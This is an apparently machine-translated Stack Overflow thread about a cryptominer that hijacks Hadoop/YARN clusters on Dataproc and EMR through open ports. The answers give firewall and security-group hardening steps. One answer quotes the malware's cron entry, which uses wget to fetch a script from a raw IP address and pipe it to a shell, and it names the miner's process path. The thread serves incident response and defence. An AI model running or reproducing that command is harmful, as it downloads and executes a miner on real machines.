Вирус Google Cloud Dataproc CrytalMiner (dr.who)

После создания кластера dataproc многие задания автоматически отправляются в ResourceManager пользователем dr.who. Это истощает ресурсы кластера и в конечном итоге перегружает кластер.

В логах мало информации.

Кто-нибудь еще испытывает эту проблему в dataproc?


google-cloud-platform google-cloud-dataproc
person user477466    schedule 11.07.2018    source источник
comment
Это похоже на вирус. Похоже, что это связано с community.hortonworks.com/questions/191898/   -  person Michael Howard    schedule 11.07.2018
comment
То же самое здесь после пары недель на AWS. С каких это пор вы начали выпускать?   -  person belka    schedule 17.07.2018
comment
Возможный дубликат YARN Ошибка попытки приложения Dr.who   -  person Mike Pone    schedule 31.10.2018

Ответы (4)


arrow_upward
6
arrow_downward

Не зная больше, вот что я подозреваю.

  • Похоже, что ваш кластер был скомпрометирован
  • Правила вашего брандмауэра (сети), скорее всего, открыты, разрешая любой трафик в кластер.
  • Кто-то обнаружил, что ваш кластер открыт для общего доступа в Интернете, и использует его в своих интересах.

Я рекомендую вам сделать следующее немедленно:

  1. Защитите правила брандмауэра, которые вы используете для предотвращения доступа извне; не открывайте порты в общедоступный интернет
  2. Если вы не используете кластер(ы) Cloud Dataproc, удалите их.
  3. Если у вас были какие-либо задания или данные в этом кластере, вы должны рассматривать эти данные как потенциально скомпрометированные (поскольку любой может получить доступ к кластеру).

Если вам нужен доступ к WebUI в кластере, используйте прокси SOCKS и SSH.

person James    schedule 11.07.2018

arrow_upward
1
arrow_downward

Что, вероятно, происходит с вами:

  • хакер сканирует каждую открытую уязвимость (IP-адрес + порт) и сохраняет их в таблице нарушений
  • хакер сканирует таблицу брешей и пытается выяснить, недавно вы запускали кластер или нет
  • при наличии уязвимого кластера хакер подключается к нему (все открыто и уязвимость найдена!)
  • парень подключается к вашему кластеру, удаляет все (в моем случае скрипт называется zz.sh, и вы можете найти его по ссылке BitBucket ниже), затем загружает приложение для майнинга
  • YARN считает, что работники терпят неудачу, но я даже не думаю, что приложение Hadoop больше не работает.

Я предлагаю вам попытаться найти адрес bitbucket/github в журналах ошибок. Также вы можете попробовать найти команду get/wget/apt-get/curl.

Думаю, теперь он богат.

Две важные вещи:

  • убедитесь, что ваша конфигурация группы безопасности достаточно сильна, без публичных авторизаций везде
  • убедитесь, что ваш SSH-ключ не скомпрометирован.

Что вам нужно сделать:

Идея состоит в том, чтобы заблокировать ненужные открытые порты с помощью обновленной групповой политики безопасности и при необходимости использовать VPC. Я опишу первый вариант с основными шагами.

  1. [НЕОБЯЗАТЕЛЬНО] измените свои SSH-ключи (внимание: это может легко сломать вашу систему, делать это нужно осторожно)
  2. перейдите на экран EC2> Сеть и безопасность> Группы безопасности

Рисунок Б

  1. Создайте новую группу безопасности и настройте возможные подключения только от мастера и его узлов (вы можете настроить входное подключение из данной группы безопасности).
  2. используйте группу безопасности, описанную в (3), при запуске нового экземпляра EC2/EMR. (должно появиться при проверке конфигурации безопасности кластера)

Рисунок А

Связано:
person belka    schedule 17.07.2018
comment
Я столкнулся с той же проблемой в наших кластерах aws emr. Не могли бы вы написать подробное руководство о том, как противостоять этим атакам. Специально настроить VPC и т.п. или как заблокировать открытые порты на AWS. Спасибо! - person user238607; 21.09.2018
comment
@user238607 user238607 только что обновил мой ответ рекомендациями. Не стесняйтесь голосовать, если это поможет - person belka; 24.09.2018

arrow_upward
0
arrow_downward

Вирус представляет собой майнер криптовалюты, который создает тысячи dr. кто работает, как то, что вы описываете. Задания предназначены для «переустановки» криптомайнера, если вы попытаетесь его удалить. Вот как удалить майнер навсегда.

Проверьте задания cron в виде пряжи на каждом подозрительном узле и удалите их.

$ sudo -u yarn crontab -e

*/2 * * * * wget -q -O - http://185.222.210.59/cr.sh | ш > /dev/null 2>&1

Затем проверьте процесс «java», подобный этому, и уничтожьте его.

/var/tmp/java -c /var/tmp/wc.conf

Вам также необходимо защитить все входящие порты вашего кластера, чтобы предотвратить их повторение. Особенно ваши порты менеджера ресурсов.

Смотрите это для получения дополнительной информации. https://community.hortonworks.com/questions/191898/hdp-261-virus-crytalminer-drwho.html

person Mike Pone    schedule 05.11.2018

arrow_upward
0
arrow_downward

GCP: если вам нужно изменить свою группу безопасности по умолчанию: ssh (сделайте ее tcp: 22). Я думаю, это поможет вам решить вашу проблему.

person Ravindra Singh    schedule 23.01.2019